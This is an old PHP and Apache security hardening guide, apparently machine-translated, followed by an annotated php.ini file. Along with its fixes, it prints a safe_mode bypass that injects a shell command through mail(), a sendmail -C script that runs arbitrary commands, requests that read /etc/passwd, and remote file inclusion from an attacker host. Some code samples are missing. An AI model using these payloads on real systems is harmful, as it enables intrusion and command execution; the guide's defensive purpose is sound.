1. Web server security
PHP is actually just a module function of the Web server, so the security of the Web server must be ensured first. Of course, in order for a web server to be secure, it must first ensure system security, which is a long way off. PHP can be combined with various web servers, and only Apache will be discussed here. It is highly recommended to install and start Apache in chroot mode. In this way, even if there are vulnerabilities in Apache, PHP and their scripts, only the restricted system will be affected and will not harm the actual system. However, using chrooted Apache will also bring certain troubles to the application. For example, when connecting to mysql, the 127.0.0.1 address must be used to connect using tcp instead of localhost for socket connection, which is slightly less efficient. There is also a problem with mail function sending emails, because in php.ini:
[mail function]
; For Win32 only.
SMTP=localhost
; For Win32 only.
sendmail_from [email protected]
is for the Win32 platform, so sendmail needs to be adjusted in the chroot environment.
2. Problems with PHP itself Network administrator u.bitscn@com
1. Remote overflow
All versions below PHP-4.1.2 have file upload remote buffer overflow vulnerabilities, and the attack program has been widely circulated, with a very high success rate.
2. Remote denial of service
PHP-4.2.0 and PHP-4.2.1 have a remote vulnerability in PHP multipart/form-data POST request processing. Although local user permissions cannot be obtained, it can also cause a denial of service.
3. The safe_mode bypass vulnerability
also exists in PHP-4.2.2 and below to PHP-4.0.5. The PHP mail function bypasses the safe_mode restriction and executes commands. Starting from version 4.0.5, the mail function adds a fifth parameter. Due to the design If you are not careful, you can break through the restrictions of safe_mode and execute commands. The breakthrough in version 4.0.5 is very simple. You just need to separate it with a semicolon and add the shell command. For example, if there is a PHP script evil.php:
execute the following URL:
http://foo.com/evil.php?bar =;/usr/bin/id [email protected]
This will send the result of id execution to [email protected] .
For PHP from 4.0.6 to 4.2.2, breaking through the safe_mode restriction actually uses the -C parameter of sendmail, so the system must use sendmail. The following code can break through safe_mode restrictions and execute commands:
#Note, the following two must not exist.
Or their owners are the same as the owners of this script
$script="/tmp/script123";
$cf="/tmp/cf123";
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $:
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
Users who use the above problematic version of PHP must upgrade to the latest version in time, so as to eliminate basic security problems.
3. The security configuration of PHP itself.
The configuration of PHP is very flexible. It can be set through php.ini, httpd.conf, .htaccess files (AllowOverride All or Options must be set in this directory), and you can also use ini_set() in the script program. and other specific functions to set. Each value of the configuration option can be obtained through the phpinfo() and get_cfg_var() functions.
If the configuration option is the only PHP_INI_SYSTEM attribute, it must be modified through php.ini and httpd.conf. They modify the PHP Master value, but after the modification, apache must be restarted to take effect. The options set in php.ini are effective for all scripts in the web server, and the options set in httpd.conf are effective for all scripts in the defined directory.
If there are other PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL attribute options, you can use the .htaccess file to set them, or you can use the ini_set() function in the script itself to set them. They modify the Local value, and the changes will take effect immediately. However, .htaccess only takes effect for the script program in the current directory, and the ini_set() function only takes effect after setting the ini_set() function for the script program. The option attributes of each version may be different. You can use the following command to find the main.c file of the current source code to get all the options and its attributes:
# grep PHP_INI_ /PHP_SRC/main/main.c
Before discussing PHP security configuration , you should have a good understanding of PHP's safe_mode mode.
1. safe_mode
safe_mode is the only PHP_INI_SYSTEM attribute and must be set through php.ini or httpd.conf. To enable safe_mode, just modify php.ini:
safe_mode = On
Or modify httpd.conf and define the directory:
Options FollowSymLinks
php_admin_value safe_mode 1
safe_mode will take effect after restarting apache. Enabling safe_mode will restrict many PHP functions, especially system-related file opening, command execution and other functions.
All functions that operate files will only operate files with the same UID as the script. For example, the content of the test.php script is:
The properties of several files are as follows:
# ls -la
total 13
drwxr-xr-x 2 root root 104 Jul 20 01:25 .
drwxr-xr-x 16 root root 384 Jul 18 12:02 ..
-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html
-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php
Requesting test.php in the browser will prompt the following error message:
Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1
If the UID of the directory where the manipulated file is located is consistent with the UID of the script, then the UID of the file can be accessed even if it is different from the script. I wonder if this is a vulnerability in PHP or if there is another hidden reason. Therefore, it is best for the user who is the owner of the php script to only use it for this purpose. It is absolutely forbidden to use root as the owner of the php script. This will not achieve the effect of safe_mode.
If you want to relax it to GID comparison, you can consider only comparing the GID of the file by turning on safe_mode_gid. You can set the following options:
safe_mode_gid = On.
After setting safe_mode, all commands executed will be restricted to only the functions specified in safe_mode_exec_dir in php.ini. programs in the directory, and shell_exec and `ls -l` will be prohibited from executing commands. If you really need to call other programs, you can make the following settings in php.ini:
safe_mode_exec_dir = /usr/local/php/exec
and then copy the program to this directory, then the php script can use system and other functions to execute the program. Moreover, shell scripts in this directory can still call system commands in other directories.
safe_mode_include_dir string
Override UID/GID checks when including files from this directory and its subdirectories (directories must be in include_path or included with full paths).
Starting with PHP 4.2.0, this directive can accept semicolon-delimited paths in a similar style to the include_path directive, rather than just a directory.
The specified limit is actually a prefix, not a directory name. This means that "safe_mode_include_dir = /dir/incl" will allow access to "/dir/include" and "/dir/incls" if they exist. If you wish to restrict access to a specific directory, add a trailing slash, for example: "safe_mode_include_dir = /dir/incl/".
safe_mode_allowed_env_vars string
Setting certain environment variables may be a potential security gap. This directive contains a comma separated list of prefixes. In safe mode, users can only change environment variables whose names have the prefix provided here. By default, users can only set environment variables starting with PHP_ (for example, PHP_FOO = BAR).
Note: If this directive is empty, PHP will allow the user to modify any environment variable!
safe_mode_protected_env_vars string
This directive contains a comma-separated list of environment variables that the end user cannot change using putenv(). These variables cannot be changed even when allowed modification is set in safe_mode_allowed_env_vars.
Although safe_mode is not a panacea (lower versions of PHP can be bypassed), it is still strongly recommended to turn on safe mode, which can avoid some unknown attacks to a certain extent. However, enabling safe_mode will have many restrictions, which may affect the application, so the code and configuration need to be adjusted to achieve harmony. For functions restricted or blocked by safe mode, please refer to the PHP manual.
After discussing safe_mode, let's discuss how to avoid vulnerabilities through the configuration of the PHP server based on actual problems that may arise in the program code.
2. Variable abuse
PHP defaults to register_globals = On. Variables for GET, POST, Cookie, Environment, and Session can be directly registered as global variables. Their registration order is variables_order = "EGPCS" (can be modified through php.ini). The right side of variables_order with the same name covers the left side, so the abuse of variables can easily cause program confusion. Moreover, script programmers often do not have the habit of initializing variables. Program fragments like the following are extremely vulnerable to attacks:
//test_1.php
if ($pass == "hello")
$auth = 1;
if ($auth == 1)
echo "some important information";
else
echo "nothing";
?>
The attacker can bypass the check by simply using the following request:
http://victim/test_1.php?auth=1
Although this is a very weak mistake, some famous programs have also made this mistake. For example, phpnuke's remote file copy vulnerability: http://www.securityfocus.com/bid/3361
When PHP-4.1.0 was released, it was recommended to turn off register_globals and provide 7 special array variables to use various variables. Variables from GET, POST, COOKIE, etc. are not directly registered as variables and must be accessed through array variables. When PHP-4.2.0 was released, the default configuration of php.ini was register_globals = Off. This allows the program to use the default value initialized by PHP itself, which is usually 0, preventing attackers from controlling the judgment variables.
Solution:
Set register_globals = Off in the configuration file php.ini.
The programmer is required to initialize a value for the judgment variable at the beginning of the program.
3. The file opens
an extremely vulnerable code snippet:
//test_2.php
if (!($str = readfile("$filename"))) {
echo("Could not open file: $filename
n");
exit;
}
else {
echo $str;
}
?>
Since the attacker can specify any $filename, the attacker can see /etc/passwd with the following request:
http://victim/test_2.php?filename=/etc/passwd
The following request can read the php file itself :
http://victim/test_2.php?filename=test_2.php
The file opening functions in PHP include fopen(), file(), etc. If the file name variable is not checked strictly, important files on the server will be accessed and read. .
Solution:
Unless otherwise necessary, limit PHP file operations to the web directory. The following is an example of modifying the apache configuration file httpd.conf:
php_admin_value open_basedir /usr/local/apache/htdocs
After restarting apache, the PHP script in the /usr/local/apache/htdocs directory can only operate files in its own directory, otherwise PHP will report an error:
Warning: open_basedir restriction in effect.
File is in wrong directory in xxx on line xx.
Using safe_mode mode can also avoid this problem, which has been discussed earlier.
4. Contains files
with extremely vulnerable code snippets:
//test_3.php
if(file_exists($filename))
include("$filename");
?>
This kind of irresponsible code will cause considerable harm. An attacker can obtain the /etc/passwd file by using the following request:
http://victim/test_3.php?filename=/etc/passwd
If for the Unix version of PHP ( The Win version of PHP does not support remote opening of files) The attacker can create a file containing shell commands on the machine where he has opened the http or ftp service. For example, the content of http://attack/attack.txt is, then the following request You can execute the command ls /etc on the target host:
http://victim/test_3.php?filename=http://attack/attack.txt
The attacker can even use the access.log and error.log log files containing apache to The code to execute the command is obtained, but sometimes it is not easy to succeed due to too much interference information.
For another form, the following code snippet:
//test_4.php
include("$lib/config.php");
?>
The attacker can create a config.php file containing command execution code on his own host, and then use the following request to execute the command on the target host:
http://victim/test_4.php?lib=http://attack
PHP Included functions include include(), include_once(), require(), require_once. If the variable containing the file name is not checked strictly, it will cause serious danger to the system, and the command can be executed remotely.
Solution:
Programmers are required to try not to use variables when including parameters in files. If variables are used, the file names to be included must be strictly checked and must not be specified arbitrarily by the user.
For example, limiting the PHP operation path in the previous file opening is a necessary option. In addition, unless otherwise necessary, be sure to turn off PHP's remote file opening function. Modify the php.ini file:
allow_url_fopen = Off
Restart apache
[PHP]
; PHP is still an evolving tool and its features are constantly being removed.
; And the setting changes of php.ini can reflect considerable changes,
; Before using a new PHP version, it would be beneficial to study php.ini
;;;;;;;;;;;;;;;;;;;;;
;About this document;
;;;;;;;;;;;;;;;;;;;;;
This file controls many aspects of PHP's view. In order for PHP to read this file, it must be named
; 'php.ini'.PHP will search for the file in these places: the current working directory; the environment variable PHPRC
; The specified path; the path specified when compiling.
; Under Windows, the path when compiling is the Windows installation directory.
; In command line mode, the search path for php.ini can be replaced with the -c parameter.
; The syntax of this file is very simple. Whitespace characters and lines starting with a semicolon ';' are simply ignored (as you might
; same as guessed). Chapter titles (eg: [Foo]) are also simply ignored, even though in the future they might
; has some meaning.
;
; directives are specified using the following syntax:
; indicator identifier = value
; directive = value
; Indicates that the identifier is *case-sensitive* - foo=bar is different from FOO = bar.
;
; The value can be a string, a number, a PHP constant (such as: E_ALL or M_PI), INI constant
; A (On, Off, True, False, Yes, No and None), or an expression
; (eg: E_ALL & ~E_NOTICE), or a quoted string ("foo").
;
; Expressions in INI files are restricted to bitwise operators and parentheses.
; | bitwise OR
; & bitwise AND
; ~ bitwise NOT
; ! boolean NOT
;
; Boolean flags can be turned on with values 1, On, True or Yes.
; They can be set to off with the values 0, Off, False or No.
;
; An empty string can be represented by writing nothing after the equal sign, or by using the None keyword:
;
; foo = ; Set foo to an empty string
; foo = none ; Set foo to an empty string
; foo = "none" ; Set foo to the string 'none'
;
; If you use constants in value settings, and these constants belong to dynamically loaded extension libraries (not PHP extensions, that is
; Zend extensions), you can only use these constants *after* the lines that call in these extensions.
;
; All values set in the php.ini-dist file are the same as the built-in default values (that is, if php.ini
; is not used or you deleted these lines, the default value is the same).
;;;;;;;;;;;;;;;;;;;;;;
;Language options;
;;;;;;;;;;;;;;;;;;;;;;
engine = On
; Make PHP scripting language engine available under Apache.
short_open_tag = On
; Allows the <? tag (this simple representation). Only <?php and <script> tags will be recognized.
asp_tags = Off
; Allow ASP-style <% %> tags
precision=14
; The number of effective digits when displaying floating point type numbers
y2k_compliance = Off
; Whether to turn on Y2K adaptation (may cause problems in non-Y2K-adaptive browsers)
output_buffering = Off
; Output caching allows you to send header (including cookies) lines even after outputting the body content
; The cost is that the output layer slows down a bit. You can use output caching to turn on output caching at runtime,
; Or turn the directive On here to enable output caching for all files.
output_handler = ; You can redirect all output of your script to a function,
; That might be useful for processing or logging it.
; For example, if you set this output_handler to "ob_gzhandler",
; the output will be transparently compressed for browsers that support gzip or deflate encoding.
; Set an output processor to automatically open output buffering.
implicit_flush = Off
; Force flush to tell PHP to tell the output layer to automatically refresh its own data after each output block.
; This is equivalent to calling the flush() function after every print() or echo() call and after every HTML block.
; Turning on this setting will cause serious runtime conflicts. It is recommended to turn it on only during debugging.
allow_call_time_pass_reference = On
; Whether to force function calls to pass parameters by reference. This method was protested.
; and may no longer be supported in future versions of PHP/Zend.
; It is encouraged to specify which parameters are passed by reference in the function declaration.
; You are encouraged to try turning this option off and verify that your scripts still work properly, to ensure future versions of the language
; They will still work. (You will get a warning every time you use this feature, and the parameters will be by value rather than by reference.
; Pass).
; Safe Mode safe mode
safe_mode = Off
safe_mode_exec_dir =
safe_mode_allowed_env_vars = PHP_
; ? Setting certain environment variables
; ? may be a potential security breach.
; This directive contains a comma-separated list of prefixes. In safe mode, users can only replace
; the values of environment variables that begin with the prefixes listed here.
; By default, users will only be able to set environment variables starting with PHP_ (eg: PHP_FOO=BAR).
; NOTE: If this directive is empty, PHP will let the user change any environment variables!
safe_mode_protected_env_vars = LD_LIBRARY_PATH
; This directive contains a comma-separated list of environment variables that the end user will not be able to change using putenv ().
; These variables are protected even when safe_mode_allowed_env_vars is set to allowed.
disable_functions =
; This directive allows you to disable specific functions for security reasons.
; It accepts a comma-separated list of function names.
; This instruction is *not* affected by whether safe mode is on.
; The color of syntax highlighting mode.
; Anything acceptable by <font color=???> will work.
highlight.string = #DD0000
highlight.comment = #FF8000
highlight.keyword = #007700
highlight.bg = #FFFFFF
highlight.default = #0000BB
highlight.html = #000000
; Misc Miscellaneous
expose_php = Off
; Determines whether PHP should indicate the fact that it is installed on the server (e.g. add it - PHP - to the web service
; on the signal sent).
; (My personal opinion is to turn this off when any power-by header appears.)
; It poses no security threat, but it makes it possible to check whether PHP is installed on your server.
;;;;;;;;;;;;;;;;;;;;;
; Resource Limits ;
;;;;;;;;;;;;;;;;;;;;
max_execution_time = 30 ; Maximum execution time of each script, in seconds
memory_limit = 8388608; The maximum amount of memory that can be used by a script (here is 8MB)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Error handling and logging ;
; Error control and registration;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Error reporting is bitwise. Or add the numbers to get the desired error reporting level.
; E_ALL - all errors and warnings
; E_ERROR - fatal runtime error
; E_WARNING - runtime warning (non-fatal error)
; E_PARSE - compile-time parsing error
; E_NOTICE - runtime reminders (these are often caused by bugs in your code,
; It may also be caused by intentional behavior. (eg: using an uninitialized variable based on
the fact that the uninitialized variable is automatically initialized to an ; empty string)
; E_CORE_ERROR - fatal error that occurs during the initialization process when PHP starts
; E_CORE_WARNING - a warning (non-fatal error) that occurs during the initialization process when PHP starts
; E_COMPILE_ERROR - fatal compile-time error
; E_COMPILE_WARNING - compile-time warning (non-fatal error)
; E_USER_ERROR - user generated error message
; E_USER_WARNING - user generated warning message
; E_USER_NOTICE - user generated reminder message
; example:
; error_reporting = E_ALL & ~E_NOTICE ; Show all errors except reminders
; error_reporting = E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR ; Show errors only
error_reporting = E_ALL & ~E_NOTICE ; Show all errors except reminders
display_errors = On ; display error messages (as part of the output)
; On the final published web site, it is strongly recommended that you turn off this feature and use
; Error log instead (see below).
; It is possible to continue to enable display_errors in the final published website
; Expose some security-related information, such as file paths on your web service,
; Your database configuration or other information.
display_startup_errors = Off ; Occurs during the PHP startup step even when display_erroes is turned on
; errors will not be displayed.
; It is strongly recommended to keep display_startup_errors turned off,
; Except during the error correction process.
log_errors = Off ; Record errors in the log file (server-specific log, stderr standard error output, or error_log (below))
; As stated above, it is strongly recommended that you log errors on the final published website
; Replace direct error output.
track_errors = Off ; Save the latest error/warning message in variable $php_errormsg (boolean)
;error_prepend_string = "<font color=ff0000>" ; The string output before the error message
;error_append_string = "</font>" ; The string output after the error message
;error_log = filename ; Record error log to the specified file
;error_log = syslog ; Record the error log in the system log syslog (event log under NT, invalid under Windows 95)
warn_plus_overloading = Off ; Warn when using '+' with strings
;;;;;;;;;;;;;;;;;;
; Data Handling ;
;;;;;;;;;;;;;;;;;;; variables_order = "EGPCS" ; This directive describes the PHP record
; The order of GET, POST, Cookie, Environment and Built-in variables.
; (represented by G, P, C, E & S, usually referenced as EGPCS or GPC).
; Records from left to right, new values replace old values.
register_globals = On ; Whether to register these EGPCS variables as global variables.
; You may want to turn this off if you don't want user data to be cluttered globally.
; This makes more sense in conjunction with track_vars - this way you can pass
; $HTTP_*_VARS[] array access all GPC variables.
register_argc_argv = On ; This directive tells PHP whether to declare argv and argc variables
; (Note: here argv is an array and argc is the number of variables)
; (which contains data passed using the GET method).
; If you don't want to use these variables, you should turn it off to improve performance.
track_vars = On ; Make the $HTTP_*_VARS[] array valid, here * is used when using
; ENV, POST, GET, COOKIE or SERVER replacement
post_max_size = 8M ; Maximum size of POST data that PHP will accept.
gpc_order = "GPC" ; This directive is deprecated. Use variables_order instead.
; Magic quotes
magic_quotes_gpc = On ; Use magic quotes in input GET/POST/Cookie data
; (The original text is like this, haha, the so-called magic quotes should refer to using escape characters to add reference control characters, such as '....)
magic_quotes_runtime= Off ; Use magic quotes for data generated at runtime,
; For example: data obtained by SQL query, data obtained by exec() function, etc.
magic_quotes_sybase = Off ; Use Sybase style magic quotes (use 'extract' instead of '')
; Automatically add files before and after PHP documents
auto_prepend_file =
auto_append_file =
; Like 4.04b4, PHP by default always outputs the encoding of a character in the "Content-type:" header.
; Disables the output character set as long as it is set to empty.
; PHP's built-in default is text/html
default_mimetype = "text/html"
;default_charset = "iso-8859-1"
;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Paths and Directories ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;
include_path = ; include path setting, UNIX: "/path1:/path2" Windows: "path1;path2"
doc_root = ; The root path of the php page, only valid when it is not empty.
user_dir = ; Tells php which directory to look for when opening the script using /~username. It is only valid when it is not empty.
;upload_tmp_dir = ; Temporary directory to store files uploaded using HTTP protocol (use the system default if not specified)
upload_max_filesize = 2097152 ; File upload is limited to 2 Meg by default
extension_dir = c:php ; directory where loadable extension libraries (modules) are stored
enable_dl = On ; Whether to enable dl().
; The dl() function *doesn't* work well on a multi-threaded server,
; such as IIS or Zeus, and disabled by default on them
;;;;;;;;;;;;;;;;;;
; File Uploads ;
;;;;;;;;;;;;;;;;;;
file_uploads = On; Whether to allow HTTP file uploads
;upload_tmp_dir = ; Temporary directory for files uploaded via HTTP (system default is used if not specified)
upload_max_filesize = 2M; Maximum allowed size of uploaded files
; Fopen wrappers;
;;;;;;;;;;;;;;;;;;;;
allow_url_fopen = On ; Whether to allow URLs to be treated as http:.. or files as ftp:...
;;;;;;;;;;;;;;;;;;;;;;;;
;Dynamic expansion;
; Dynamic Extensions ;
;;;;;;;;;;;;;;;;;;;;;;;;
; If you want an extension library to be loaded automatically, use the following syntax:
; extension=modulename.extension
; For example, on Windows,
; extension=msql.dll
; or under UNIX,
; extension=msql.so
; Note that this should only be the name of the module, there is no need to put directory information in it.
; Use the extension_dir above to indicate the location of the specified extension library.
;Windows extension
;extension=php_nsmail.dll
extension=php_calendar.dll
;extension=php_dbase.dll
;extension=php_filepro.dll
extension=php_gd.dll
;extension=php_dbm.dll
;extension=php_mssql.dll
;extension=php_zlib.dll
;extension=php_filepro.dll
;extension=php_imap4r2.dll
;extension=php_ldap.dll
;extension=php_crypt.dll
;extension=php_msql2.dll
;extension=php_odbc.dll
; Note that MySQL support is now built-in, so there is no need to use its dll
;;;;;;;;;;;;;;;;;;;;;
; Module settings;
; Module Settings ;
;;;;;;;;;;;;;;;;;;;;;
[Syslog]
define_syslog_variables = Off; Whether to define various system log variables
; Such as: $LOG_PID, $LOG_CRON, etc.
; Turning it off is a good idea to improve efficiency.
; At runtime, you can call the function define_syslog_variables() to define these variables
[mail function]
SMTP = localhost ; only for win32 systems
sendmail_from [email protected] ; only for win32 systems
;sendmail_path = ;only for unix, also supports parameters (default is 'sendmail -t -i')
[Debugger]
debugger.host = localhost
debugger.port = 7869
debugger.enabled = False
[Logging]
; These configurations indicate the logging mechanism used for the examples.
; See examples/README.logging for more explanation
;logging.method = db
;logging.directory = /path/to/log/directory
[Java]
;java.class.path = .php_java.jar
;java.home = c:jdk
;java.library = c:jdkjrebinhotspotjvm.dll
;java.library.path = .
[SQL]
sql.safe_mode = Off
[ODBC]
;uodbc.default_db = Not yet implemented
;uodbc.default_user = Not yet implemented
;uodbc.default_pw = Not yet implemented
uodbc.allow_persistent = On ; Allow or disable persistent connections
uodbc.check_persistent = On ; Check if the connection is still available before reusing it
uodbc.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
uodbc.max_links = -1; The maximum number of connections (persistent and non-persistent). -1 represents unlimited network management u.bitsCN.com
uodbc.defaultlrl = 4096; Controls fields of LONG type. Returns the number of bytes of the variable, 0 means passthru (?) 0 means passthru
uodbc.defaultbinmode = 1; Control binary data. 0 represents ???Handling of binary data. 0 means passthru, 1 return as is, 2 convert to char
; See the documentation for odbc_binmode and odbc_longreadlen for an explanation of uodbc.defaultlrl and uodbc.defaultbinmode.
[MySQL]
mysql.allow_persistent = On ; Allow or disable persistent connections
mysql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
mysql.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
mysql.default_port = ; The default port used by mysql_connect(). If not set, mysql_connect()
; will use the variable $MYSQL_TCP_PORT, or the mysql-tcp entry under /etc/services (unix),
; Or MYSQL_PORT is defined during compilation (in this order)
; Win32 environment, only MYSQL_PORT will be checked.
mysql.default_socket = ; The default socket name used for local MySql connections. If empty, use the MYSQL built-in value
mysql.default_host = ; The host used by mysql_connect() by default (invalid in safe mode)
mysql.default_user = ; mysql_connect () Username used by default (invalid in safe mode)
mysql.default_password = ; The password used by mysql_connect() by default (invalid in safe mode)
; Note that saving passwords under this file is generally a *bad* idea
; *Any* user with access to PHP can run
; 'echo cfg_get_var("mysql.default_password")' to display that password!
; And of course, any user with read rights to the file will also be able to see that password.
[mSQL]
msql.allow_persistent = On ; Allow or disable persistent connections
msql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
msql.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
[PostgresSQL]
pgsql.allow_persistent = On ; Allow or disable persistent connections
pgsql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
pgsql.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
[Sybase]
sybase.allow_persistent = On; Allow or disable persistent connections
sybase.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
sybase.max_links = -1; Maximum number of connections (persistent and non-persistent). -1 means unlimited
;sybase.interface_file = "/usr/sybase/interfaces"
sybase.min_error_severity = 10 ; Minimum severity of errors displayed
sybase.min_message_severity = 10 ; Minimum severity of displayed messages
sybase.compatability_mode = Off ; Compatibility mode with older versions of PHP 3.0. If turned on, this will cause PHP to automatically
; Assign them the Sybase type according to the result,
; Instead of treating them all as strings.
; This compatibility mode will not stay forever,
; Therefore, make the necessary changes to your code,
; and close the item.
[Sybase-CT]
sybct.allow_persistent = On ; Allow or disable persistent connections
sybct.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
sybct.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
sybct.min_server_severity = 10 ; Minimum severity of errors displayed
sybct.min_client_severity = 10 ; Minimum severity of displayed messages
[bcmath]
bcmath.scale = 0 ; number of decimal digits for all bcmath functions
[browscap]
;browscap = extra/browscap.ini
browscap = C:WINSYSTEMinetsrvbrowscap.ini
[Informix]
ifx.default_host = ; The host used by ifx_connect() by default (invalid in safe mode)
ifx.default_user = ; The default user name used by ifx_connect() (invalid in safe mode)
ifx.default_password = ; the default password used by ifx_connect() (invalid in safe mode)
ifx.allow_persistent = On ; Allow or disable persistent connections
ifx.max_persistent = -1 ; Maximum number of persistent connections. -1 means unlimited
ifx.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
ifx.textasvarchar = 0 ; If turned on, the select status symbol returns the contents of a 'text blob' field instead of its id
ifx.byteasvarchar = 0 ; If turned on, the select status symbol returns the contents of a 'byte blob' field instead of its id
ifx.charasvarchar = 0 ; Track whitespace stripped from a fixed-length character string.
; May be valid for Informix SE users.
ifx.blobinfile = 0 ; If turned on, the contents of text and byte blobs are exported to a file
; instead of saving to memory.
ifx.nullformat = 0 ; NULL is returned as a null field unless, here, it is set to 1.
; In this case (1), NULL is returned as the string NULL.
[Session]
session.save_handler = files; Control method for saving/retrieving data
session.save_path = C:wintemp; Parameters passed to the controller when save_handler is set to a file,
; This is the path where the data files will be saved.
session.use_cookies = 1; Whether to use cookies
session.name = PHPSESSID
; The name of the session to use in the cookie
session.auto_start = 0 ; Initialize session when request starts
session.cookie_lifetime = 0; is the cookie storage time in seconds,
; or 0, until the browser is restarted
session.cookie_path = / ; Valid path of cookie
session.cookie_domain = ; Valid domain of cookie
session.serialize_handler = php; Controller used to connect data
; php is the standard controller for PHP.
session.gc_probability = 1 ; 'garbage collection' processes by percentage
; Possibility to start every time session is initialized. Network manager bitscn_com
session.gc_maxlifetime = 1440 ; After the number of seconds indicated by this number, saved data will be considered
; 'Fragment (garbage)' and cleaned up by the gc process.
session.referer_check = ; Check HTTP referrers to invalidate additional ids included in URLs
session.entropy_length = 0 ; How many bytes to read from the file
session.entropy_file = ; Specify here to create session id
; session.entropy_length = 16
; session.entropy_file = /dev/urandom
session.cache_limiter = nocache; Set to {nocache, private, public} to determine the HTTP
; Caching problem
session.cache_expire = 180 ; The document expires after n minutes
session.use_trans_sid = 1 ; Use transitional SID support, if enabled at compile time
; --enable-trans-sid
url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=fakeentry"
[MSSQL]
;extension=php_mssql.dll
mssql.allow_persistent = On ; Allow or disable persistent connections
mssql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
mssql.max_links = -1; The maximum number of connections (persistent and non-persistent). -1 represents unlimited network management u.bitsCN.com
mssql.min_error_severity = 10 ; Minimum severity of errors displayed
mssql.min_message_severity = 10 ; Minimum severity of displayed messages
mssql.compatability_mode = Off ; Mode compatible with older versions of PHP 3.0.
[Assertion]
; ? ? ? ? ?
;assert.active = On ; ? assert(expr); active by default
;assert.warning = On ; issue a PHP warning for each failed assertion.
;assert.bail = Off ; don't bail out by default.
;assert.callback = 0 ; user-function to be called if an assertion fails.
;assert.quiet_eval = 0 ; eval the expression with current error_reporting(). set to true if you want error_reporting(0) around the eval().
[Ingres II]
ii.allow_persistent = On ; Allow or disable persistent connections
ii.max_persistent = -1; The maximum number of persistent connections. -1 means unlimited
ii.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
ii.default_database = ; default database (format: [node_id::]dbname[/srv_class]
ii.default_user = ;Default user
ii.default_password = ; Default password Network management download dl.bitscn.com
[Verisign Payflow Pro]
pfpro.defaulthost = "test.signio.com" ; Default Signio server
pfpro.defaultport = 443; Default port for connection
pfpro.defaulttimeout = 30 ; Default timeout in seconds
; pfpro.proxyaddress = ; Default proxy IP address (if required)
; pfpro.proxyport = ; Default proxy port
; pfpro.proxylogon = ; Default proxy login (logon username)
; pfpro.proxypassword = ; Default proxy password
[Sockets]
sockets.use_system_read = On; Use the system's read() function instead of the php_read() package
; Local Variables: (local variables)
; tab-width: 4
; End: